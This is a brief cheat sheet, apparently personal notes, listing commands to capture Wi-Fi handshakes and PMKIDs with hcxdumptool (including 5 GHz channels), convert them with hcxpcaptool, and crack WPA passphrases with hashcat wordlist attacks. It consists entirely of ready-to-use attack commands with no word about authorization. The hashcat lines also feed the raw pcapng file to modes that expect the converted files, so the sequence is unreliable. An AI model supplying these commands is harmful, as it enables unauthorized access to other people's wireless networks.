
Capture packages from wlan1  
`hcxdumptool -i wlan1 -o capture.pcapng --enable_status=1`

Convert capturefile to PMKID format for use in hashcat  
`hcxpcaptool -z capture.16800 -o capture.hccapx capture.pcapng`

Scan 5ghz (must define channels for 5ghz, default is only 2ghz)  
`hcxdumptool -i wlan1 -o capture.pcapng --enable_status=1 -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14,36,38,<5ghz channels>,161`

# Hashcat usage  
Handshakes:  
`hashcat -m 2500 -a 0 capture.pcapng <wordlist>`

PMKIDS:  
`hashcat -m 16800 -a 0 capture.pcapng <wordlist>`
